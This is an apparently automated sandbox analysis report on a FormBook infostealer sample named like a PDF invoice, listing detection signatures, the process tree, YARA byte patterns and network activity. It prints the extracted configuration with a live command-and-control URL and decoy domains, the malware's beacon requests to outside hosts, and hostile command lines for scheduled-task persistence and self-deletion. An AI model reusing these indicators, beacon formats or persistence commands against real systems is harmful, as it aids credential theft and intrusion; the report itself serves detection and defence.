Loading ...

Play interactive tourEdit tour

Analysis Report nova narud#U017eba pdf rvP6N.exe

Overview

General Information

Sample Name:nova narud#U017eba pdf rvP6N.exe
Analysis ID:383924
MD5:35076f942b11f79d1156069e55ab132d
SHA1:edad117505f1a87b7512a6c85cac30d691d2ff0a
SHA256:56e676fae09b69a9eae221e0590776815f7fa38e7cc90822cd3060ea289d7547
Tags:exeFormbookgeoHRV
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • nova narud#U017eba pdf rvP6N.exe (PID: 4844 cmdline: 'C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe' MD5: 35076F942B11F79D1156069E55AB132D)
    • schtasks.exe (PID: 6252 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6300 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 1516 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        3.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe' , ParentImage: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exe, ParentProcessId: 4844, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kPDOHsyqKitj' /XML 'C:\Users\user\AppData\Local\Temp\tmp59AC.tmp', ProcessId: 6252

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.lovetarot.online/sqxs/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lovetarot.online/sqxs/"], "decoy": ["creid-network.com", "dinningatcastlehill.com", "fundadilla.com", "fashionmdeasy.com", "magentos6.com", "pushpartybdp.com", "streamingnetwork.xyz", "sevenredwalls.com", "hsuehsun.space", "leanbirthdaycake.com", "rocketmortgagedeceit.com", "cashflowdb.com", "smilebringerdesign.com", "naomicoleclinic.com", "wingsforklift.com", "newsounding.com", "48hrbusinessrescue.pro", "101osthoff456.com", "attleticgreens.com", "xx233.xyz", "niziuantena.com", "photosbyamandajdaniels.com", "udharworld.com", "astrolmass.com", "wzht88.com", "victoriasessionsheroes.com", "thefuture101.com", "sihe08.com", "webingnar.com", "influentialgood.com", "jobdoctorplacements.com", "bankrotstvostavropol.pro", "gracefulfari.com", "bluevistainvestments.com", "poopertroopersct.com", "link-glue.com", "barbequeterie.com", "ajbkscw.com", "janek-sales-training.net", "salesjump.xyz", "whatthefountain.com", "centre-pour-formation.com", "aiocoin.net", "thefreemaskstore.com", "localwow.net", "steven-ross.com", "perennialhh.com", "luxebeautylash.com", "aswahorganic.com", "businesshouse5asidejm.com", "zowjain.com", "mediatraining-toronto.com", "ashtangaway.com", "solutiirecentedemarketing.club", "zgzuqw.com", "timerma.com", "aguaalcalinamexico.com", "tacostio1.com", "karitaz.com", "bismillahbodyoil.com", "c2p.life", "kacgt.com", "fastcincincinnatioffer.com", "michaels.house"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\kPDOHsyqKitj.exeReversingLabs: Detection: 14%
          Multi AV Scanner detection for submitted fileShow sources
          Source: nova narud#U017eba pdf rvP6N.exeVirustotal: Detection: 22%Perma Link
          Source: nova narud#U017eba pdf rvP6N.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.292611883.0000000001160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.499334545.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292487107.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.500645379.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.500697070.0000000001140000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247681962.0000000003C1C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292295280.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\kPDOHsyqKitj.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: nova narud#U017eba pdf rvP6N.exeJoe Sandbox ML: detected
          Source: 3.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: nova narud#U017eba pdf rvP6N.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: nova narud#U017eba pdf rvP6N.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: RegSvcs.exe, 00000003.00000002.292530659.0000000000D81000.00000004.00000020.sdmp
          Source: Binary string: RegSvcs.pdb, source: netsh.exe, 0000000F.00000002.503721845.0000000003ABF000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.292653801.00000000011A0000.00000040.00000001.sdmp, netsh.exe, 0000000F.00000002.501734799.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000003.00000002.292530659.0000000000D81000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, netsh.exe
          Source: Binary string: RegSvcs.pdb source: netsh.exe, 0000000F.00000002.503721845.0000000003ABF000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02A5A3A8
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02A5A398
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02A5A45C
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02A5B8BB
          Source: C:\Users\user\Desktop\nova narud#U017eba pdf rvP6N.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02A5B8C8

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.lovetarot.online/sqxs/
          Source: global trafficHTTP traffic detected: GET /sqxs/?9r=MRpl8UDFdJqnpJCoHCjX+0bMpbzGGukG+UMXxre6C1KfRpZnCXnM0uJ6ixOsqKWJKMs9S6HgiQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1Host: www.magentos6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqxs/?9r=vISvmTlEiopKSz7sbFBAxkFCF8r7k2dJAG7u5uLq0h9VZPMRNv+QYXnwEIKYsgNdKjl1RWh6mQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1Host: www.businesshouse5asidejm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /sqxs/?9r=MRpl8UDFdJqnpJCoHCjX+0bMpbzGGukG+UMXxre6C1KfRpZnCXnM0uJ6ixOsqKWJKMs9S6HgiQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1Host: www.magentos6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqxs/?9r=vISvmTlEiopKSz7sbFBAxkFCF8r7k2dJAG7u5uLq0h9VZPMRNv+QYXnwEIKYsgNdKjl1RWh6mQ==&sZRd=1bYDYvm0JHdHoLj HTTP/1.1Host: www.businesshouse5asidejm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.magentos6.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 10:34:41 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 78 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqxs/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.247095559.0000000002C11000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.247192769.0000000002C60000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.269916835.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comadi
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comefa
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.234005594.0000000005C54000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comE.TTF
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFt
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235975130.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsivr
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.233746796.0000000005C51000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/tm
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000002.252607725.0000000006E52000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmp, nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235359346.0000000005C4A000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.275434330.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/5
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ian
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.234872250.0000000005C46000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0bd
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235359346.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0y
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235198791.0000000005C4A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/S
          Source: nova narud#U017eba pdf rvP6N.exe, 00000000.00000003.235105401.0000000005C49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/roso
